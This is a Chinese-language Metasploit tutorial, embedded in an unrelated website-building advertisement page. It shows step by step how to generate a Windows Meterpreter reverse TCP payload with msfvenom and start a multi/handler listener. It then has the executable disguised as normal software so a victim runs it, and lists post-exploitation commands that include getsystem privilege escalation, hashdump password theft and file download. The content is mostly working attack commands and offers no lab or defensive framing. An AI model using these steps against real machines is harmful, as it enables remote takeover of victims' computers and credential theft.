大同市网站建设_网站建设公司_Java_seo优化
2025/12/27 1:11:02 网站建设 项目流程

​​​Meterpreter反向control

1.生成payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.xxx.xx.130 LPORT=5000 -f exe -o ~/桌面/payload.exe

-p windows/meterpreter/reverse_tcp:payload类型,windows平台的Meterpreter反向TCP连接

LHOST=192.xxx.xx.130:监听主机IP,本机的IP地址,目标将回连至此

LPORT=5000:,监听端口,本机监听的端口

-f exe:输出格式,Windows可执行文件

-o ~/桌面/payload.exe:输出路径,生成文件的保存位置

2.设置监听器

开启metasploit框架:msfconsole

配置监听模块

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.xxx.xx.130
msf5 exploit(multi/handler) > set LPORT 5000
msf5 exploit(multi/handler) > exploit

3.payload投递与执行:伪装成正常软件或者文件,等待目标用户点击payload.exe,j随后在内存中解密和执行,向监听端口(192.xxx.xx.130:5000)发起tcp连接,与本机完成握手

4.然后进行会话建立和控制:[*] Meterpreter session 1 opened (192.xxx.xx.130:5000 -> 192.xxx.xx.1:55980)

监听器工作原理

  1. 绑定端口:在192.xxx.xx.130:5000开启TCP监听

  2. 等待连接:阻塞等待目标系统连接

  3. 建立会话:连接建立后创建Meterpreter会话

  4. 加载Stage:发送后续的Stage Payload

5.信息收集与系统侦察:meterpreter > show_mount

目标磁盘分析

Meterpreter常用命令速查

系统:

1.系统信息:meterpreter > sysinfo

2.当前用户权限:meterpreter > getuid

3.进程id:meterpreter > getpid

4.进程列表:meterpreter > ps

文件:

1.当前目录:meterpreter > pwd
2.列出文件:meterpreter > ls
3.下载文件:meterpreter > download file.txt
4.上传文件:meterpreter > upload payload.exe

权限提升:

1.尝试提权到SYSTEM:meterpreter > getsystem
2.获取密码哈希:meterpreter > run post/windows/gather/hashdump

侦察:

网络配置:meterpreter > ipconfig
路由表:meterpreter > route
ARP缓存:meterpreter > arp

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询